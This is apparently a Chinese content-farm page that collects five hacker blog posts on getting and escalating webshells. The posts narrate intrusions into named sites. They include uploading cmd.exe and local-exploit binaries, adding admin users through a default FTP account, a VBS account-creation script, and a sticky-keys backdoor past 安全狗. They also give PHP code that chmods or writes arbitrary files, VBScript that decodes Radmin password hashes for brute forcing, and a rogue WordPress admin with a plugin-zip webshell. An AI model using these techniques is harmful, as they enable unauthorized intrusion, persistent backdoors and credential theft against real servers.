欢迎来到千学网!
您现在的位置:首页 > 实用文 > 其他范文

记一次WEBSHELL提权

时间:2025-11-22 08:12:58 其他范文 收藏本文 下载本文

今天小编在这给大家整理了记一次WEBSHELL提权,本文共5篇,我们一起来阅读吧!

篇1:记一次WEBSHELL提权

目标站点:www.xxx.com

今天闲的 ..看到群里发了一个站. 无聊 就去搞下..

怎么拿下shell就不多说了..

主要说如何提权的..给大家一个思路..

拿到shell,像往常一样 先看了下组建支持

从上图我们可以看到.权限还是挺大的.可以执行命令

然后看了下支持不支持ASPX. 我一般喜欢用ASPX的马搞..

很幸运.支持ASPX.

上了ASPX大马之后.找到了C:\\RECYCLER\\这个目录有可读可写权限.

于是呼.上传CMD.EXE

随手打了个whoami

权限不大,,直接上传个巴西烤肉

从上图看到 运行巴西烤肉 提示拒绝访问.估计服务器装了杀软..后缀改了下.还是拒绝访问.

然后又上传了各种EXP都是拒绝访问..当时就蛋碎了一地.

想了下 算了 先看看开放了什么端口吧.

55555就是终端端口了,..我惊喜的发现了65500端口 记得以前65500出现过漏洞

默认帐号go

默认密码od

打开FTP.连接65500看看有没有这个漏洞

竟然登陆上去了,看来管理员的安全意识还是有点差啊.

那就试试看这个可以提权不,

用户已经添加上去了..然后添加到管理组OK 也添加成功了 我们登陆看看帐户是否被添加上

好了 教程结束

篇2:记一次突破安全狗提权

,。果断丢御剑。

FCK编辑器拿shell还是比较简单的,直接二次上传。。

拿到shell之后看了一下,权限还是很大的,于是乎准备提权。先看下组件。

wscript.shell被删了。看下脚本探测。一看支持aspx ,果断换马。接着上传了个cmd到C:\\RECYCLER。。看看能不能执行命令、

可以执行命令。 ww. 但是net user却没回显,应该是net被禁用了、、果断上传ms11080。

成功添加用户。。但是连接的时候却这样

果断试下第二种方法。。把下面代码保存为1.vbs

Set o=CreateObject( “Shell.Users” )

Set z=o.create(“user”)

z.changePassword “12345”,“”

z.setting(“AccountType”)=3

然后以system权限运行,

。会添加一个用户user密码为12345、、

成功执行。。但是还是不行。。

估计是第三方软件阻止了。果断tasklist。。

原来有安全狗。。

试了下远控无果。。

于是准备劫持shift后门、、直接替换sethc。。

连接看看。。5下shift。没看到后门。

于是看了下进程。。发现是、、

果断替换MY_sethc。。5下shift。如图。

果断登录上去加用户。。无果

打开安全狗。。看下,被拦截了。

果断关闭帐号防护。因为net被禁用了,所以直接运行ms11080或1.vbs成功添加用户。如图。

篇3:linux提权之跨目录访问拿webshell代码

linux主机的权限设置一般情况下都很松散,少有的一些还是不能直接跨目录访问,

在linux不能提权的情况下,可以试试这些代码来跨目录试试。

第一个exp代码:

PHP代码

$path= stripslashes($_GET['path']);

$ok= chmod ($path, 0777);

if ($ok== true)

echo CHMOD OK , Permission editable file or directory. Permission to write;

?>

把以上代码保存为pahuai.com.PHP

访问www.ckpis.com/pahuai.com.php?path=../../要跨的目录/index.php

这里的index.PHP是要修改权限的文件。

第二个exp代码:

PHP代码

@$filename= stripslashes($_POST['filename']);

@$mess= stripslashes($_POST['mess']);

$fp= @fopen({$_POST['filename']}, 'a');

@fputs($fp,$mess);

@fclose($fp);

?>

CODE :

Changing CHMOD Permissions Exploit – Contact : the_gl4di4t0r[AT]hotmail[DOT]com

把代码保存为ckpis.com.php注意代码中的路径,

用的时候要改成访问的目录和文件。

篇4:Radmin软件的一次提权技巧

最近做渗透测试时常碰到RADMIN一类的东西..

一碰到此类的程序,一般我都会先看下对方把RADMIN的端口配置成什么..以及相应的PASS(加密过的)

HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\Parameter //默认密码注册表位置

HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\Port //默认端口注册表位置

//把海阳读出来的,用逗号格开,然后用下面的代码转换就可以了

CODE:

[Copy to clipboard]

Dim theStr

theStr = InputBox( “请输入要转换的密码:”, “输入”, “44,41,43,32,43,5,45,64,43,24,31,53,46,57,64,86” )

If theStr “” Then

Call InputBox(“请复制已经转换好的密码”,,zpass(theStr))

End If

Function zpass(pass)

tpass=“”

MyArray = Split(pass, “,”, -1, 1)

For each thepass in MyArray

if len(thepass) = 1 then

tpass=tpass+“0”

end if

tpass=tpass+hex(thepass)

Next

zpass=tpass

End Function

//转换后的,就可以拿爆破工具去跑了....

端口读出后类似这样 223,34,0,0

//用下面代码转换即可

CODE:

[Copy to clipboard]

Dim theStr

theStr = InputBox( “请输入要转换的端口:”, “输入”, “223,34,0,0,” )

da = Split(thestr, “,”, -1, 1)

If theStr “” Then

Call InputBox(“请复制已经转换好的端口”,,Hex2Dec(Dec2Hex(da(3))&Dec2Hex(da(2))&Dec2Hex(da(1))&Dec2Hex(da(0))))

End If

Function Hex2Dec(Hex)

Hex = UCase(Hex)

For i = 1 To Len(Hex)

Select Case Mid(Hex, Len(Hex) - i + 1, 1)

Case “0”: B = B + 16 ^ (i - 1) * 0

Case “1”: B = B + 16 ^ (i - 1) * 1

Case “2”: B = B + 16 ^ (i - 1) * 2

Case “3”: B = B + 16 ^ (i - 1) * 3

Case “4”: B = B + 16 ^ (i - 1) * 4

Case “5”: B = B + 16 ^ (i - 1) * 5

Case “6”: B = B + 16 ^ (i - 1) * 6

Case “7”: B = B + 16 ^ (i - 1) * 7

Case “8”: B = B + 16 ^ (i - 1) * 8

Case “9”: B = B + 16 ^ (i - 1) * 9

Case “A”: B = B + 16 ^ (i - 1) * 10

Case “B”: B = B + 16 ^ (i - 1) * 11

Case “C”: B = B + 16 ^ (i - 1) * 12

Case “D”: B = B + 16 ^ (i - 1) * 13

Case “E”: B = B + 16 ^ (i - 1) * 14

Case “F”: B = B + 16 ^ (i - 1) * 15

End Select

Next

Hex2Dec = B

End Function

Function Dec2Hex(Dec)

Dec2Hex = “”

Do While Dec >0

a = CStr(Dec Mod 16)

Select Case a

Case “10”: a = “A”

Case “11”: a = “B”

Case “12”: a = “C”

Case “13”: a = “D”

Case “14”: a = “E”

Case “15”: a = “F”

End Select

Dec2Hex = a & Dec2Hex

Dec = Dec \\ 16

Loop

End Function

篇5:记一次WordPress后台取webshell的方法

弄了一台数据库服务器,是虚拟主机的,

里面有不少WordPress网站的数据库。但是看样子,应该是数据库服务器和网站服务器分离。所以研究了一下WordPress的网站。去网上搜索了一下,似乎现在网上流传的漏洞WordPress官方都更新掉了。所以自己研究了一下(以前没研究过WordPress)

以网站:free2styler.co.uk/

为例来说一下我是怎么拿到webshell的。既然已经有了数据库,就算是网站跟数据库不是一台服务器,其他的一切也都很好办了(我是这么觉得)。

看了下WordPress的密码加密方式,我在本地跑了一下。

按照如下信息添加管理员:

free2styler.co.uk/wp-admin/

使用用户名为silic密码:blackbap.org登录既可

按照网上说的,在后台媒体上传部分上传php后缀的webshell,显然是失败了,

提示文件类似不允许

寻找了一通,发现安装插件那里有点意思

我首先将webshell打包,格式为zip(其余的什么也不用加,就一个webshell就可以了)

上传后,发现系统出现错误回显:

这些错误回显直接无视掉。原先的webshell是:best.php打包后叫best.zip

那么访问:

free2styler.co.uk/wp-content/plugins/best/best.php

就得到了webshell的地址了

作者:YoCo Smart

来自:习科信息技术 Silic Group Hacker Army

提权不仅仅是文件权限上的问题

记一次劳动

记一次接力赛

记一次春游

记一次篮球赛

记一次校运会_

浅谈变形PHP WEBSHELL检测

记一次体育比赛作文

记一次家务劳动作文

记一次运动会作文

《记一次WEBSHELL提权(集锦5篇).doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

点击下载本文文档